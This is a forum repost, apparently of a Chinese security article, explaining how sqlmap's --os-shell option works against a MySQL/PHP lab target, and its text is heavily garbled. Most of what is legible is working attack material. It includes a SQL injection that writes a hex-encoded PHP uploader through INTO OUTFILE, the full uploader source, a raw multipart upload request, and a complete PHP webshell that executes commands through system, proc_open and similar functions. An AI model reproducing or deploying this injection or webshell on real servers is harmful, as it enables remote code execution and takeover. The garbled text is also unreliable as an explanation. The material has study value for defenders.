搜索

[2070] 2021-06-26_sqlmap--os-shell原理浅析

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-16
2021-06-26_sqlmap--os-shell原理浅析 s q l m a p   - - o s - s h e l l     d o n 9   d o n 9 s e c   2 0 2 1 - 0 6 - 2 6   #   , 7 s q l m a p   - - o s - s h e l l   s q l m a p   - - o s - s h e l l   s q l m a p   - - o s - s h e l l   1 m y s q l   > = 5 . 5 . 5 3   N U L L m y s q l   < 5 . 5 . 5 3         s e c u r e _ f i l e _ p r i v       2 ( ) 3 / s q l m a p   - - o s - s h e l l   s q l m a p / a a p h p b s t e p 1 : h t t p #     s e c u r e _ f i l e _ p r i v   s h o w   g l o b a l   v a r i a b l e s   l i k e   ' % s e c u r e % ' ; s q l m a p   h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 7 / s q l i l a b / L e s s - 1 / ? i d = 1   - - o s - s h e l l   - - p r o x y   h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0
s t e p 2 : 1 I N T O   O U T F I L E   +   L I N E S   T E R M I N A T E D   B Y     =   L I N E S   T E R M I N A T E D   B Y   w e b s h e l l / 1 G P C ,   2   L I N E S   T E R M I N A T E D   B Y   w e b s h e l l 4 姿 u n i o n   s e l e c t   l i n e s   s t a r t i n g   b y f i e l d s   t e r m i n a t e d   b y c o l u m n s   t e r m i n a t e d   b y f i e l d s   t e r m i n a t e d   b y x . p h p 1 t m p u p c e u . p h p 1 '   O R   1 0 2 3 = 1 0 2 3   L I M I T   0 , 1   I N T O   O U T F I L E   ' E : / p h p S t u d y / W W W / t m p u p c e u . p h p ' L I N E S   T E R M I N A T E D   B Y   0 x 3 c 3 f 7 0 6 8 7 0 0 a 6 9 6 6 2 0 2 8 6 9 7 3 7 3 6 5 7 4 2 8 2 4 5 f 5 2 4 5 5 1 5 5 4 5 5 3 5 4 5 b 2 2 7 5 7 0 6 c 6 f 6 1 6 4 2 2 5 d 2 9 2 9 7 b 2 4 6 4 6 9 7 2 3 d 2 4 5 f 5 2 4 5 5 1 5 5 4 5 5 3 5 4 5 b 2 2 7 5 7 0 6 c 6 f 6 1 6 4 4 4 6 9 7 2 2 2 5 d 3 b 6 9 6 6 2 0 2 8 7 0 6 8 7 0 7 6 6 5 7 2 7 3 6 9 6 f 6 e 2 8 2 9 3 c 2 7 3 4 2 e 3 1 2 e 3 0 2 7 2 9 7 b 2 4 6 6 6 9 6 c 6 5 3 d 2 4 4 8 5 4 5 4 5 0 5 f 5 0 4 f 5 3 5 4 5 f 4 6 4 9 4 c 4 5 5 3 5 b 2 2 6 6 6 9 6 c 6 5 2 2 5 d 5 b 2 2 6 e 6 1 6 d 6 5 2 2 5 d 3 b 4 0 6 d 6 f 7 6 6 5 5 f 7 5 7 0 6 c 6 f 6 1 6 4 6 5 6 4 5 f 6 6 6 9 6 c 6 5 2 8 2 4 4 8 5 4 5 4 5 0 5 f 5 0 4 f 5 3 5 4 5 f 4 6 4 9 4 c 4 5 5 3 5 b 2 2 6 6 6 9 6 c 6 5 2 2 5 d 5 b 2 2 7 4 6 d 7 0 5 f 6 e 6 1 6 d 6 5 2 2 5 d 2 c 2 4 6 4 6 9 7 2 2 e 2 2 2 f 2 2 2 e 2 4 6 6 6 9 6 c 6 5 2 9 2 0 6 f 7 2 2 0 6 4 6 9 6 5 2 8 2 9 3 b 7 d 6 5 6 c 7 3 6 5 7 b 2 4 6 6 6 9 6 c 6 5 3 d 2 4 5 f 4 6 4 9 4 c 4 5 5 3 5 b 2 2 6 6 6 9 6 c 6 5 2 2 5 d 5 b 2 2 6 e 6 1 6 d 6 5 2 2 5 d 3 b 4 0 6 d 6 f 7 6 6 5 5 f 7 5 7 0 6 c 6 f 6 1 6 4 6 5 6 4 5 f 6 6 6 9 6 c 6 5 2 8 2 4 5 f 4 6 4 9 4 c 4 5 5 3 5 b 2 2 6 6 6 9 6 c 6 5 2 2 5 d 5 b 2 2 7 4 6 d 7 0 5 f 6 e 6 1 6 d 6 5 2 2 5 d 2 c 2 4 6 4 6 9 7 2 2 e 2 2 2 f 2 2 2 e 2 4 6 6 6 9 6 c 6 5 2 9 2 0 6 f 7 2 2 0 6 4 6 9 6 5 2 8 2 9 3 b 7 d 4 0 6 3 6 8 6 d 6 f 6 4 2 8 2 4 6 4 6 9 7 2 2 e 2 2 2 f 2 2 2 e 2 4 6 6 6 9 6 c 6 5 2 c 3 0 3 7 3 5 3 5 2 9 3 b 6 5 6 3 6 8 6 f 2 0 2 2 4 6 6 9 6 c 6 5 2 0 7 5 7 0 6 c 6 f 6 1 6 4 6 5 6 4 2 2 3 b 7 d 6 5 6 c 7 3 6 5 2 0 7 b 6 5 6 3 6 8 6 f 2 0 2 2 3 c 6 6 6 f 7 2 6 d 2 0 6 1 6 3 7 4 6 9 6 f 6 e 3 d 2 2 2 e 2 4 5 f 5 3 4 5 5 2 5 6 4 5 5 2 5 b 2 2 5 0 4 8 5 0 5 f 5 3 4 5 4 c 4 6 2 2 5 d 2 e 2 2 2 0 6 d 6 5 7 4 6 8 6 f 6 4 3 d 5 0 4 f 5 3 5 4 2 0 6 5 6 e 6 3 7 4 7 9 7 0 6 5 3 d 6 d 7 5 6 c 7 4 6 9 7 0 6 1 7 2 7 4 2 f 6 6 6 f 7 2 6 d 2 d 6 4 6 1 7 4 6 1 3 e 3 c 6 9 6 e 7 0 7 5 7 4 2 0 7 4 7 9 7 0 6 5 3 d 6 8 6 9 6 4 6 4 6 5 6 e 2 0 6 e 6 1 6 d 6 5 3 d 4 d 4 1 5 8 5 f 4 6 4 9 4 c 4 5 5 f 5 3 4 9 5 a 4 5 2 0 7 6 6 1 6 c 7 5 6 5 3 d 3 1 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 0 3 e 3 c 6 2 3 e 7 3 7 1 6 c 6 d 6 1 7 0 2 0 6 6 6 9 6 c 6 5 2 0 7 5 7 0 6 c 6 f 6 1 6 4 6 5 7 2 3 c 2 f 6 2 3 e 3 c 6 2 7 2 3 e 3 c 6 9 6 e 7 0 7 5 7 4 2 0 6 e 6 1 6 d 6 5 3 d 6 6 6 9 6 c 6 5 2 0 7 4 7 9 7 0 6 5 3 d 6 6 6 9 6 c 6 5 3 e 3 c 6 2 7 2 3 e 7 4 6 f 2 0 6 4 6 9 7 2 6 5 6 3 7 4 6 f 7 2 7 9 3 a 2 0 3 c 6 9 6 e 7 0 7 5 7 4 2 0 7 4 7 9 7 0 6 5 3 d 7 4 6 5 7 8 7 4 2 0 6 e 6 1 6 d 6 5 3 d 7 5 7 0 6 c 6 f 6 1 6 4 4 4 6 9 7 2 2 0 7 6 6 1 6 c 7 5 6 5 3 d 4 5 3 a 5 c 5 c 7 0 6 8 7 0 5 3 7 4 7 5 6 4 7 9 5 c 5 c 5 7 5 7 5 7 5 c 5 c 3 e 2 0 3 c 6 9 6 e 7 0 7 5 7 4 2 0 7 4 7 9 7 0 6 5 3 d 7 3 7 5 6 2 6 d 6 9 7 4 2 0 6 e 6 1 6 d 6 5 3 d 7 5 7 0 6 c 6 f 6 1 6 4 2 0 7 6 6 1 6 c 7 5 6 5 3 d 7 5 7 0 6 c 6 f 6 1 6 4 3 e 3 c 2 f 6 6 6 f 7 2 6 d 3 e 2 2 3 b 7 d 3 f 3 e 0 a 1 '   O R   1 0 2 3 = 1 0 2 3   L I M I T   0 , 1   I N T O   O U T F I L E   ' E : / p h p S t u d y / W W W / n o G P C . p h p ' L I N E S   T E R M I N A T E D   B Y   ' < ? p h p   p h p i n f o ( )   ? > ' ; < ? p h p i f   ( i s s e t ( $ _ R E Q U E S T [ " u p l o a d " ] ) )   {         $ d i r   =   $ _ R E Q U E S T [ " u p l o a d D i r " ] ;
s t e p 3 : 2 t m p u p c e u . p h p p h p t m p b q s f e . p h p         i f   ( p h p v e r s i o n ( )   <   ' 4 . 1 . 0 ' )   {                 $ f i l e   =   $ H T T P _ P O S T _ F I L E S [ " f i l e " ] [ " n a m e " ] ;                 @ m o v e _ u p l o a d e d _ f i l e ( $ H T T P _ P O S T _ F I L E S [ " f i l e " ] [ " t m p _ n a m e " ] ,   $ d i r   .   " / "   .   $ f i l e )   o r   d i e ( ) ;         }   e l s e   {                 $ f i l e   =   $ _ F I L E S [ " f i l e " ] [ " n a m e " ] ;                 @ m o v e _ u p l o a d e d _ f i l e ( $ _ F I L E S [ " f i l e " ] [ " t m p _ n a m e " ] ,   $ d i r   .   " / "   .   $ f i l e )   o r   d i e ( ) ;         }         @ c h m o d ( $ d i r   .   " / "   .   $ f i l e ,   0 7 5 5 ) ;         e c h o   " F i l e   u p l o a d e d " ; }   e l s e   {         e c h o   " < f o r m   a c t i o n = "   .   $ _ S E R V E R [ " P H P _ S E L F " ]   .   "   m e t h o d = P O S T   e n c t y p e = m u l t i p a r t / f o r m - d a t a > < i n p u t   t y p e = h i d d e n   n a m e = M A X _ F I L E _ S I Z E   v a l u e = 1 0 0 0 0 0 0 0 0 0 > < b > s q l m a p   f i l e   u p l o a d e r < / b > < b r > < i n p u t   n a m e = f i l e   t y p e = f i l e > < b r > t o   d i r e c t o r y :   < i n p u t   t y p e = t e x t   n a m e = u p l o a d D i r   v a l u e = E : p h p S t u d y W W W >   < i n p u t   t y p e = s u b m i t   n a m e = u p l o a d   v a l u e = u p l o a d > < / f o r m > " ; }   ? > P O S T   / t m p u p c e u . p h p ? i d = 1   H T T P / 1 . 1 C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = b c d 4 6 4 e 8 1 f e c 4 0 5 b 8 a a 4 6 2 f 3 f f 3 b f c f 2 C o n t e n t - L e n g t h :   1 2 5 0 C a c h e - C o n t r o l :   n o - c a c h e U s e r - A g e n t :   s q l m a p / 1 . 5 . 5 # s t a b l e   ( h t t p : / / s q l m a p . o r g ) H o s t :   1 9 2 . 1 6 8 . 0 . 1 0 7 A c c e p t :   * / * A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e - - b c d 4 6 4 e 8 1 f e c 4 0 5 b 8 a a 4 6 2 f 3 f f 3 b f c f 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " u p l o a d " 1 - - b c d 4 6 4 e 8 1 f e c 4 0 5 b 8 a a 4 6 2 f 3 f f 3 b f c f 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " u p l o a d D i r " E : p h p S t u d y W W W - - b c d 4 6 4 e 8 1 f e c 4 0 5 b 8 a a 4 6 2 f 3 f f 3 b f c f 2 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " f i l e " ;   f i l e n a m e = " t m p b q s f e . p h p " C o n t e n t - T y p e :   a p p l i c a t i o n / o c t e t - s t r e a m w e b s h e l l - - b c d 4 6 4 e 8 1 f e c 4 0 5 b 8 a a 4 6 2 f 3 f f 3 b f c f 2 - - < ? p h p   $ c   =   $ _ R E Q U E S T [ " c m d " ] ; @ s e t _ t i m e _ l i m i t ( 0 ) ; @ i g n o r e _ u s e r _ a b o r t ( 1 ) ; @ i n i _ s e t ( " m a x _ e x e c u t i o n _ t i m e " ,   0 ) ; $ z   =   @ i n i _ g e t ( " d i s a b l e _ f u n c t i o n s " ) ; i f   ( ! e m p t y ( $ z ) )   {         $ z   =   p r e g _ r e p l a c e ( " / [ ,   ] + / " ,   ' , ' ,   $ z ) ;         $ z   =   e x p l o d e ( ' , ' ,   $ z ) ;         $ z   =   a r r a y _ m a p ( " t r i m " ,   $ z ) ; }   e l s e   {         $ z   =   a r r a y ( ) ; } $ c   =   $ c   .   "   2 > & 1 n " ; f u n c t i o n   f ( $ n )   {         g l o b a l   $ z ;         r e t u r n   i s _ c a l l a b l e ( $ n )   a n d   ! i n _ a r r a y ( $ n ,   $ z ) ; } i f   ( f ( " s y s t e m " ) )   {         o b _ s t a r t ( ) ;         s y s t e m ( $ c ) ;         $ w   =   o b _ g e t _ c l e a n ( ) ; }   e l s e i f   ( f ( " p r o c _ o p e n " ) )   {         $ y   =   p r o c _ o p e n ( $ c ,   a r r a y ( a r r a y ( p i p e ,   r ) ,   a r r a y ( p i p e ,   w ) ,   a r r a y ( p i p e ,   w ) ) ,   $ t ) ;         $ w   =   N U L L ;
s t e p 4 : 退 o s - s h e l l h t t p w e b s h e l l         w h i l e   ( ! f e o f ( $ t [ 1 ] ) )   {                 $ w . =   f r e a d ( $ t [ 1 ] ,   5 1 2 ) ;         }         @ p r o c _ c l o s e ( $ y ) ; }   e l s e i f   ( f ( " s h e l l _ e x e c " ) )   {         $ w   =   s h e l l _ e x e c ( $ c ) ; }   e l s e i f   ( f ( " p a s s t h r u " ) )   {         o b _ s t a r t ( ) ;         p a s s t h r u ( $ c ) ;         $ w   =   o b _ g e t _ c l e a n ( ) ; }   e l s e i f   ( f ( " p o p e n " ) )   {         $ x   =   p o p e n ( $ c ,   r ) ;         $ w   =   N U L L ;         i f   ( i s _ r e s o u r c e ( $ x ) )   {                 w h i l e   ( ! f e o f ( $ x ) )   {                         $ w . =   f r e a d ( $ x ,   5 1 2 ) ;                 }         }         @ p c l o s e ( $ x ) ; }   e l s e i f   ( f ( " e x e c " ) )   {         $ w   =   a r r a y ( ) ;         e x e c ( $ c ,   $ w ) ;         $ w   =   j o i n ( c h r ( 1 0 ) ,   $ w )   .   c h r ( 1 0 ) ; }   e l s e   {         $ w   =   0 ; } e c h o   " < p r e > $ w < / p r e > " ;   ? > #   / t m p b q s f e . p h p ? c m d = d e l   / F   / Q   E : p h p S t u d y W W W t m p u p c e u . p h p #   p h p / t m p b q s f e . p h p ? c m d = d e l   / F   / Q   E : p h p S t u d y W W W t m p b q s f e . p h p
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理